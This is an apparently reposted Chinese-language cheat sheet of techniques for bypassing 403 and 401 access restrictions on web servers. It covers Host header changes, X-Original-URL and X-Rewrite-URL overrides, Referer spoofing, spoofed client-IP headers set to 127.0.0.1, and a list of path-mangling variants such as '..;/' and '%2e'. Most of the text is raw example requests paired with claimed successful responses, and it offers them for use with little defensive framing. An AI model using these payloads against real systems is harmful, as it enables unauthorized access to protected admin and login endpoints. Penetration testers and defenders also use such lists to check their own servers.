扫描主机端口,找其它开放web服务的端口;访问其端口。
修改HOST把host值修改为子域名或者ip来绕过。
覆盖请求 URL尝试使用 X-Original-URL 和 X-Rewrite-URL 标头绕过 Web 服务器的限制。
Request GET /auth/login HTTP/1.1 Response HTTP/1.1 403 Forbidden Reqeust GET / HTTP/1.1 X-Original-URL: /auth/login Response HTTP/1.1 200 OK or Reqeust GET / HTTP/1.1 X-Rewrite-URL: /auth/login Response HTTP/1.1 200 OKReferer 标头绕过
尝试使用 Referer 标头绕过 Web 服务器的限制。
介绍:Referer 请求头包含了当前请求页面的来源页面的地址,即表示当前页面是通过此来源页面里的链接进入的。服务端一般使用 Referer 请求头识别访问来源。
Request GET /auth/login HTTP/1.1 Host: xxx Response HTTP/1.1 403 Forbidden Reqeust GET / HTTP/1.1 Host: xxx ReFerer:https://xxx/auth/login Response HTTP/1.1 200 OK or Reqeust GET /auth/login HTTP/1.1 Host: xxx ReFerer:https://xxx/auth/login Response HTTP/1.1 200 OK代理 IP
一般开发者会通过 Nginx 代理识别访问端 IP 限制对接口的访问,尝试使用 X-Forwarded-For、X-Forwared-Host 等标头绕过 Web 服务器的限制。
X-Originating-IP: 127.0.0.1 - X-Remote-IP: 127.0.0.1 - X-Client-IP: 127.0.0.1 - X-Forwarded-For: 127.0.0.1 - X-Forwared-Host: 127.0.0.1 - X-Host: 127.0.0.1 - X-Custom-IP-Authorization: 127.0.0.1
示例:
Request GET /auth/login HTTP/1.1 Response HTTP/1.1 401 Unauthorized Reqeust GET /auth/login HTTP/1.1 X-Custom-IP-Authorization: 127.0.0.1 Response HTTP/1.1 200 OK扩展名绕过
基于扩展名,用于绕过 403 受限制的目录。
site.com/admin => 403 site.com/admin/ => 200 site.com/admin// => 200 site.com//admin// => 200 site.com/admin => 200 site.com/admin/. => 200 site.com/admin/./ => 200 site.com/./admin/./ => 200 site.com/admin/./. => 200 site.com/admin/./. => 200 site.com/admin? => 200 site.com/admin?? => 200 site.com/admin??? => 200 site.com/admin..;/ => 200 site.com/admin/..;/ => 200 site.com/%2f/admin => 200 site.com/%2e/admin => 200 site.com/admin%20/ => 200 site.com/admin%09/ => 200 site.com/%20admin%20/ => 200
参考:https://www.wangan.com/articles/2483
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)